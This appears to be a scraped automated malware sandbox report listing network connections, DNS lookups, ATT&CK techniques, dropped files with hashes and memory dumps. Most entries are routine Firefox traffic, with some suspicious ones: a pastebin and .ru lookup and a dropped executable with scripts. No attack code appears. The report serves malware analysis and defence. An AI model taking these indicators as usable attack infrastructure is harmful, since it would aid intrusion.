52 B
1
34.160.144.191:443

content-signature-2.cdn.mozilla.net

tls

firefox.exe

1.6kB
11.3kB
13
17
88.221.134.155:80

http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip

http

firefox.exe

9.5kB
467.1kB
189
341

HTTP Request

GET http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip

HTTP Response

200
216.58.212.238:443

redirector.gvt1.com

tls

firefox.exe

1.8kB
9.0kB
19
20
172.217.132.166:443

r1---sn-5hne6nzy.gvt1.com

tls

firefox.exe

203.2kB
8.7MB
3172
6239
204.79.197.200:443

tse1.mm.bing.net

tls, http2

926 B
8.1kB
10
14
204.79.197.200:443

tse1.mm.bing.net

tls, http2

880 B
8.0kB
9
11
204.79.197.200:443

https://tse1.mm.bing.net/th?id=OADD2.10239317301047_1S8G2IIVJ6Z2H00N1&pid=21.2&w=1920&h=1080&c=4

tls, http2

25.9kB
2.0MB
512
1422

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301480_1GLUO11W92SWCVMG3&pid=21.2&w=1080&h=1920&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340418600_11EQ8QDR6IPB0F4AN&pid=21.2&w=1080&h=1920&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340418599_1G42Z13GRT0FB3ANC&pid=21.2&w=1920&h=1080&c=4

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301047_1S8G2IIVJ6Z2H00N1&pid=21.2&w=1920&h=1080&c=4

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200
204.79.197.200:443

tse1.mm.bing.net

tls, http2

926 B
8.1kB
10
13
34.117.121.53:443

firefox-settings-attachments.cdn.mozilla.net

tls

firefox.exe

1.1kB
3.9kB
12
10
34.117.121.53:443

firefox-settings-attachments.cdn.mozilla.net

tls

firefox.exe

1.3kB
3.8kB
12
9
34.117.121.53:443

firefox-settings-attachments.cdn.mozilla.net

tls

firefox.exe

1.3kB
3.9kB
12
10
34.117.121.53:443

firefox-settings-attachments.cdn.mozilla.net

tls

firefox.exe

163.9kB
1.3MB
1268
1887
34.117.121.53:443

firefox-settings-attachments.cdn.mozilla.net

tls

firefox.exe

1.1kB
3.9kB
11
10
34.117.121.53:443

firefox-settings-attachments.cdn.mozilla.net

tls

firefox.exe

1.1kB
3.8kB
12
9

8.8.8.8:53

71.31.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

71.31.126.40.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

241.154.82.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

241.154.82.20.in-addr.arpa
8.8.8.8:53

187.178.17.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

187.178.17.96.in-addr.arpa
8.8.8.8:53

55.36.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

55.36.223.20.in-addr.arpa
8.8.8.8:53

41.110.16.96.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

41.110.16.96.in-addr.arpa
8.8.8.8:53

g.bing.com

dns

56 B
158 B
1
1

DNS Request

g.bing.com

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

232.168.11.51.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

232.168.11.51.in-addr.arpa
8.8.8.8:53

200.197.79.204.in-addr.arpa

dns

146 B
106 B
2
1

DNS Request

200.197.79.204.in-addr.arpa

DNS Request

200.197.79.204.in-addr.arpa
8.8.8.8:53

149.220.183.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

149.220.183.52.in-addr.arpa
8.8.8.8:53

pastebin.com

dns

WmiPrvSE.exe

58 B
106 B
1
1

DNS Request

pastebin.com

DNS Response

104.20.67.143

104.20.68.143

172.67.34.170
8.8.8.8:53

50.23.12.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

50.23.12.20.in-addr.arpa
8.8.8.8:53

a0926674.xsph.ru

dns

WmiPrvSE.exe

62 B
78 B
1
1

DNS Request

a0926674.xsph.ru

DNS Response

141.8.192.6
8.8.8.8:53

206.23.85.13.in-addr.arpa

dns

142 B
145 B
2
1

DNS Request

206.23.85.13.in-addr.arpa

DNS Request

206.23.85.13.in-addr.arpa
8.8.8.8:53

143.67.20.104.in-addr.arpa

dns

144 B
134 B
2
1

DNS Request

143.67.20.104.in-addr.arpa

DNS Request

143.67.20.104.in-addr.arpa
8.8.8.8:53

183.142.211.20.in-addr.arpa

dns

73 B
159 B
1
1

DNS Request

183.142.211.20.in-addr.arpa
8.8.8.8:53

240.221.184.93.in-addr.arpa

dns

146 B
144 B
2
1

DNS Request

240.221.184.93.in-addr.arpa

DNS Request

240.221.184.93.in-addr.arpa
8.8.8.8:53

13.86.106.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

13.86.106.20.in-addr.arpa
8.8.8.8:53

190.178.17.96.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

190.178.17.96.in-addr.arpa
8.8.8.8:53

22.236.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

22.236.111.52.in-addr.arpa
8.8.8.8:53

contile.services.mozilla.com

dns

firefox.exe

74 B
90 B
1
1

DNS Request

contile.services.mozilla.com

DNS Response

34.117.237.239
8.8.8.8:53

contile.services.mozilla.com

dns

firefox.exe

74 B
90 B
1
1

DNS Request

contile.services.mozilla.com

DNS Response

34.117.237.239
8.8.8.8:53

contile.services.mozilla.com

dns

firefox.exe

74 B
155 B
1
1

DNS Request

contile.services.mozilla.com
8.8.8.8:53

content-signature-2.cdn.mozilla.net

dns

firefox.exe

81 B
235 B
1
1

DNS Request

content-signature-2.cdn.mozilla.net

DNS Response

34.160.144.191
8.8.8.8:53

prod.content-signature-chains.prod.webservices.mozgcp.net

dns

firefox.exe

103 B
119 B
1
1

DNS Request

prod.content-signature-chains.prod.webservices.mozgcp.net

DNS Response

34.160.144.191
8.8.8.8:53

prod.content-signature-chains.prod.webservices.mozgcp.net

dns

firefox.exe

103 B
131 B
1
1

DNS Request

prod.content-signature-chains.prod.webservices.mozgcp.net

DNS Response

2600:1901:0:92a9::
8.8.8.8:53

shavar.services.mozilla.com

dns

firefox.exe

146 B
157 B
2
1

DNS Request

shavar.services.mozilla.com

DNS Request

shavar.services.mozilla.com

DNS Response

54.218.225.239

44.237.149.213

44.239.242.57
8.8.8.8:53

push.services.mozilla.com

dns

firefox.exe

71 B
125 B
1
1

DNS Request

push.services.mozilla.com

DNS Response

34.107.243.93
8.8.8.8:53

autopush.prod.mozaws.net

dns

firefox.exe

70 B
86 B
1
1

DNS Request

autopush.prod.mozaws.net

DNS Response

34.107.243.93
8.8.8.8:53

autopush.prod.mozaws.net

dns

firefox.exe

70 B
155 B
1
1

DNS Request

autopush.prod.mozaws.net
8.8.8.8:53

firefox.settings.services.mozilla.com

dns

firefox.exe

83 B
161 B
1
1

DNS Request

firefox.settings.services.mozilla.com

DNS Response

34.149.100.209
8.8.8.8:53

prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

188 B
110 B
2
1

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net

DNS Response

34.149.100.209
8.8.8.8:53

shavar.prod.mozaws.net

dns

firefox.exe

136 B
116 B
2
1

DNS Request

shavar.prod.mozaws.net

DNS Request

shavar.prod.mozaws.net

DNS Response

54.218.225.239

44.239.242.57

44.237.149.213
8.8.8.8:53

shavar.services.mozilla.com

dns

firefox.exe

146 B
157 B
2
1

DNS Request

shavar.services.mozilla.com

DNS Request

shavar.services.mozilla.com

DNS Response

44.239.242.57

54.218.225.239

44.237.149.213
8.8.8.8:53

prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

188 B
187 B
2
1

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net
8.8.8.8:53

shavar.prod.mozaws.net

dns

firefox.exe

68 B
153 B
1
1

DNS Request

shavar.prod.mozaws.net
8.8.8.8:53

239.225.218.54.in-addr.arpa

dns

73 B
137 B
1
1

DNS Request

239.225.218.54.in-addr.arpa
8.8.8.8:53

203.197.79.204.in-addr.arpa

dns

73 B
106 B
1
1

DNS Request

203.197.79.204.in-addr.arpa
8.8.8.8:53

aus5.mozilla.org

dns

firefox.exe

62 B
180 B
1
1

DNS Request

aus5.mozilla.org

DNS Response

35.244.181.201
8.8.8.8:53

prod.balrog.prod.cloudops.mozgcp.net

dns

firefox.exe

82 B
98 B
1
1

DNS Request

prod.balrog.prod.cloudops.mozgcp.net

DNS Response

35.244.181.201
8.8.8.8:53

prod.balrog.prod.cloudops.mozgcp.net

dns

firefox.exe

82 B
175 B
1
1

DNS Request

prod.balrog.prod.cloudops.mozgcp.net
8.8.8.8:53

prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

94 B
110 B
1
1

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net

DNS Response

34.149.100.209
8.8.8.8:53

prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

94 B
187 B
1
1

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net
8.8.8.8:53

201.181.244.35.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

201.181.244.35.in-addr.arpa
8.8.8.8:53

ciscobinary.openh264.org

dns

firefox.exe

70 B
286 B
1
1

DNS Request

ciscobinary.openh264.org

DNS Response

88.221.134.155

88.221.134.209
8.8.8.8:53

a19.dscg10.akamai.net

dns

firefox.exe

67 B
99 B
1
1

DNS Request

a19.dscg10.akamai.net

DNS Response

88.221.134.155

88.221.134.209
8.8.8.8:53

a19.dscg10.akamai.net

dns

firefox.exe

67 B
123 B
1
1

DNS Request

a19.dscg10.akamai.net

DNS Response

2a02:26f0:a1::58dd:869b

2a02:26f0:a1::58dd:86d1
8.8.8.8:53

155.134.221.88.in-addr.arpa

dns

146 B
139 B
2
1

DNS Request

155.134.221.88.in-addr.arpa

DNS Request

155.134.221.88.in-addr.arpa
8.8.8.8:53

redirector.gvt1.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

redirector.gvt1.com

DNS Response

216.58.212.238
8.8.8.8:53

redirector.gvt1.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

redirector.gvt1.com

DNS Response

216.58.212.238
8.8.8.8:53

redirector.gvt1.com

dns

firefox.exe

130 B
93 B
2
1

DNS Request

redirector.gvt1.com

DNS Request

redirector.gvt1.com

DNS Response

2a00:1450:4009:80b::200e
8.8.8.8:53

r1---sn-5hne6nzy.gvt1.com

dns

firefox.exe

71 B
116 B
1
1

DNS Request

r1---sn-5hne6nzy.gvt1.com

DNS Response

172.217.132.166
8.8.8.8:53

r1.sn-5hne6nzy.gvt1.com

dns

firefox.exe

69 B
85 B
1
1

DNS Request

r1.sn-5hne6nzy.gvt1.com

DNS Response

172.217.132.166
8.8.8.8:53

238.212.58.216.in-addr.arpa

dns

73 B
173 B
1
1

DNS Request

238.212.58.216.in-addr.arpa
8.8.8.8:53

r1.sn-5hne6nzy.gvt1.com

dns

firefox.exe

69 B
97 B
1
1

DNS Request

r1.sn-5hne6nzy.gvt1.com

DNS Response

2a00:1450:400e:15::6
216.58.212.238:443

redirector.gvt1.com

https

firefox.exe

3.4kB
10.9kB
9
11
172.217.132.166:443

r1.sn-5hne6nzy.gvt1.com

https

firefox.exe

4.6kB
7.9kB
7
9
8.8.8.8:53

166.132.217.172.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

166.132.217.172.in-addr.arpa
8.8.8.8:53

88.156.103.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

88.156.103.20.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
173 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

firefox-settings-attachments.cdn.mozilla.net

dns

firefox.exe

90 B
177 B
1
1

DNS Request

firefox-settings-attachments.cdn.mozilla.net

DNS Response

34.117.121.53
8.8.8.8:53

attachments.prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

106 B
122 B
1
1

DNS Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

DNS Response

34.117.121.53
8.8.8.8:53

attachments.prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

106 B
199 B
1
1

DNS Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net
239.255.255.250:3702

fdPHost

4.6kB
7
8.8.8.8:53

c.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa

dns

118 B
182 B
1
1

DNS Request

c.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa
239.255.255.250:3702

fdPHost
8.8.8.8:53

10.179.89.13.in-addr.arpa

dns

142 B
145 B
2
1

DNS Request

10.179.89.13.in-addr.arpa

DNS Request

10.179.89.13.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\entries\E66F5AA5E3C285C270CF84BD11111C74D38F245C

Filesize
13KB

MD5
bd1350a8033f5d96c9a44cdf587f29cf

SHA1
12f90a0e33e455cd0945666260759ce540216bcb

SHA256
08d829f7a65a6e767ba8dd21c014582f89633be6571682721c8f9f98de1ba384

SHA512
288ddd54f552ad015342f551e09b139f83d182dda12b51ec01c4bb6b0ae2999ea02856e0f210873c8a4ede4cf0e679ef23cb5044ff05b42b4a32f7772f38d1e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\WPPuo7WD3O.bat

Filesize
197B

MD5
92e3902f680cde418469c3753bf4b319

SHA1
a7e75a4adf55505f3f441750addbcdae5c893834

SHA256
e8e6bae527a1ff67a6a4cb81ff7bf4525cf962e0c071feacd1ee4998a6bd1296

SHA512
d8a1a5fcdf3bf5f7e7131512054e1bc0438c307bb9d2ca703e84f6d4882f73b525b1d3c510602663544b6b8f1b09f9812de464d8b08b43e2c2d603c33a27d2bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
442KB

MD5
85430baed3398695717b0263807cf97c

SHA1
fffbee923cea216f50fce5d54219a188a5100f41

SHA256
a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e

SHA512
06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

Filesize
8.0MB

MD5
a01c5ecd6108350ae23d2cddf0e77c17

SHA1
c6ac28a2cd979f1f9a75d56271821d5ff665e2b6

SHA256
345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42

SHA512
b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\db\data.safe.bin

Filesize
2KB

MD5
8fafdb77d8aa376306db2afc7d6c8ed0

SHA1
308e74cc6618ef941575902a848ba15e88d9654f

SHA256
4f71c4135398a1860ea2accfe86f597bf19aa6e3fd28eda19f897cd3c8767570

SHA512
cc3467457962d34a0c767d6d27dcfbabd7ce81b64e5fe86491432297d9aa9c8e489a1715452d86912135d0059502ea2a5a9eea312d8d5003526bbc0676f205bf

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\pending_pings\1828f740-fe76-4977-b234-c71b0b8106d1

Filesize
746B

MD5
300fbb4a77e8f6ceb77e5d67b9959443

SHA1
5095e6d330befebcd105b49b086ef66d2e6516f5

SHA256
7e829f55b1a33617ff04db180f344fe8e6ee53fcd3f99709509b06205b9c80a5

SHA512
7bd38a61d6afd3e79f9cda221f3b3ee85d73fdd6197973c2bba235743f003faa4379f4beae2bfd82d5146136b4652da8809b74eebce41057bc388fcdc2742efe

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\pending_pings\451e1006-1214-4dbd-9879-7765131bc94b

Filesize
11KB

MD5
a458ffb09e137cbae2edafdba270a573

SHA1
8015a1dbba1dfb93b7e5203032ca892604821879

SHA256
7c15cd4ac8bd2ec1c3d9946dbe94e129f2e11ff67cc10adcdf385dd9bb3479e6

SHA512
3a986b613cf5060ee653c7f302bb30b322a73ed8b899fdb8c0a240e83562cb99f5b77f57032b81f079e383e8ffc917d89febc4c2c85436d0c402c352b8cd0f58

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

Filesize
62KB

MD5
e8d09ae247e90f50a3f6acf3a8f19fa5

SHA1
5d5c965913c17408ac264c4e041c82b2a9de6cef

SHA256
4d2c191c1ac43b636eacf3476791c3789f0f4c88352e173252a8e4046386df9d

SHA512
6b503ce8158b9bd4847dae424e978d94c83b6306ff7008b405278cde0b96bb232eb2f01e7e183f6780639dd487d643420f242f47a670e38688730a17f26cf7b0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

Filesize
116B

MD5
3d33cdc0b3d281e67dd52e14435dd04f

SHA1
4db88689282fd4f9e9e6ab95fcbb23df6e6485db

SHA256
f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b

SHA512
a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

Filesize
479B

MD5
49ddb419d96dceb9069018535fb2e2fc

SHA1
62aa6fea895a8b68d468a015f6e6ab400d7a7ca6

SHA256
2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539

SHA512
48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

Filesize
372B

MD5
8be33af717bb1b67fbd61c3f4b807e9e

SHA1
7cf17656d174d951957ff36810e874a134dd49e0

SHA256
e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd

SHA512
6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

Filesize
11.8MB

MD5
33bf7b0439480effb9fb212efce87b13

SHA1
cee50f2745edc6dc291887b6075ca64d716f495a

SHA256
8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e

SHA512
d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

Filesize
1KB

MD5
688bed3676d2104e7f17ae1cd2c59404

SHA1
952b2cdf783ac72fcb98338723e9afd38d47ad8e

SHA256
33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237

SHA512
7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

Filesize
1KB

MD5
937326fead5fd401f6cca9118bd9ade9

SHA1
4526a57d4ae14ed29b37632c72aef3c408189d91

SHA256
68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81

SHA512
b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js

Filesize
8KB

MD5
f33900f458c979afd4444ea0e3dab78e

SHA1
b36d6b0632f60d913a7a4595d70dce123a85480c

SHA256
a718ba9e9895d1b34eb9e753f58e28770c752015cebd3918fc87b28f4ed19073

SHA512
051ff7e2a0acc1a743db694ca30b0c87bcca8480ab7b70bd281b3178c62089c074721b2f9113e068944fe8c07144428974605d28c61869d13a69f9969d79dd0a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js

Filesize
6KB

MD5
29954ab4553dcb831a4eaf86c0d40053

SHA1
ca4de84d9329e45b548a8468f3bbc566674bea15

SHA256
53c4aea5851faa61ea31809474fbc59348a8b0c48aa3d9a56f74e6e093f8df1f

SHA512
95aeaebfdf2216b2331fb8d7ffa3806955be0408f01d95685de555e6e92b0c6eebffc74551fc38eb52f616c25c494ab565221b2875c27e30fcfeb8dc1659e0ba

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs-1.js

Filesize
6KB

MD5
359d26ab81065a973516c94803904723

SHA1
c636f56262dd4f93ae107d714de8512887178335

SHA256
3292d57397a965737933341abf6a86eb52aafd073b630a41190a70c3bde99d68

SHA512
481406d8c59ea7acfa1599275992fd115d754a38c0cf3979ad9fa2f62daeb001a172fb37a0a1a1deb66c0f6ec547bc04482d2c5a233325f8f696e433f55f5eec

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\prefs.js

Filesize
6KB

MD5
975ece8e44750781cf08beec792baedb

SHA1
8252af63b3b4efe506be9df55d35f84e9cf57099

SHA256
60e8701ba6c48d2bdb885012470ac13140b2ce63a67ffe159c2ab9d15f064c54

SHA512
f6a6f4657709b4917620e6e29cbcf9749aa20f045a0d83cb832e780133b6fcdb8afa3c644301b9abab249440028462c55cabc9c77e0b3775544a20ede632dc7f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
1KB

MD5
b446a1c106b105aa66d2f426d37876cc

SHA1
16c6f9997cea183560af37fb9de7edf8cb8f9c61

SHA256
2cb7abecbc7460db47993856faa3ae849cf4c1fdfb33b1a9e675a7f7719bc6e3

SHA512
9b7bef024409dc6439b3c1a8426f33b4b3c1226c80e3f51b946781197a1c144440532e36e605a23178a715333ca321b4a0700b5a6eaf1fc29db0c4efc46ca2ed

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
901KB

MD5
8ad7207486846b9867705babf8352a2e

SHA1
76888a603fc671bbc85618bd97b6b6b463a80f2e

SHA256
54a74c4638a4e32a6be11ad6d18b6346494fd5df091a726cbfe5b011817b947f

SHA512
1a6775d4960ab42ec3323629fadd71d7bb319912ed351e0938c4e321b1471aeb9b2fb49f1f36259ca64d4fc83151c9abac46ec6af5ed026841a55a86d539090a

Download Submit
C:\WebreviewRuntime\DA0G5NQf2P.vbe

Filesize
203B

MD5
7fa3bfacfe0cacddb6346eeb7778b9e0

SHA1
78401945f41a85308674f3bde838b26a510e4233

SHA256
3d3d160d1d8264ac4aa1893fe67933ed5beb63aeaac1def84303abf3ca339f5d

SHA512
593ad78bad06523899c96afaf02f50cf8cda5ffffb01b402db63d8640beb55cc777dea84d568bc094d6320263d749a45a3d588562af1d2f4a9238595354fe701

Download Submit
C:\WebreviewRuntime\TaqdBAfZaG.bat

Filesize
144B

MD5
f58eadc9badc34d4296980bcd9a7d257

SHA1
cee017450cadfdc68e6ba8c9d26f76cff1586cba

SHA256
a4768266d92d5695d29070cfdb3538a5fd8557ca3674dc810921a0d9f6212219

SHA512
320299b8a6186b3af170d6997818ff75f7c34205da139aa0031afaae8e101ab7f2c30479fe5cc40614daf244e0b4d17a7190e0d7123bfcb7325b75122edc7677

Download Submit
C:\WebreviewRuntime\comweb.exe

Filesize
863KB

MD5
30f1d9098a779211064a5a0e258e74f0

SHA1
23109fab7d75cd1cde1d4bd94a1313f432497314

SHA256
6829753d21c982cf0ea6700ebbc9f78c411047406052507f00dd0169f9db7b95

SHA512
f69f49a166e88db2331a1e3826554d5fea983becce45260518e65d09b069babcfe3e478c612ad856b7eac79d66e395d3596b69b9caa1444cbf71b56714394c33

Download Submit
memory/1448-61-0x00007FFD82CA0000-0x00007FFD83761000-memory.dmp

Filesize
10.8MB

Download
memory/1448-59-0x000000001B0B0000-0x000000001B0C0000-memory.dmp

Filesize
64KB

Download
memory/1448-58-0x00007FFD82CA0000-0x00007FFD83761000-memory.dmp

Filesize
10.8MB

Download
memory/1448-57-0x000000001B0B0000-0x000000001B0C0000-memory.dmp

Filesize
64KB

Download
memory/1448-56-0x00007FFD82CA0000-0x00007FFD83761000-memory.dmp

Filesize
10.8MB

Download
memory/2068-12-0x0000000000DA0000-0x0000000000E80000-memory.dmp

Filesize
896KB

Download
memory/2068-15-0x0000000002F90000-0x0000000002F9A000-memory.dmp

Filesize
40KB

Download
memory/2068-13-0x00007FFD82CA0000-0x00007FFD83761000-memory.dmp

Filesize
10.8MB

Download
memory/2068-52-0x00007FFD82CA0000-0x00007FFD83761000-memory.dmp

Filesize
10.8MB

Download
memory/2068-14-0x0000000001680000-0x0000000001690000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Response

HTTP Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request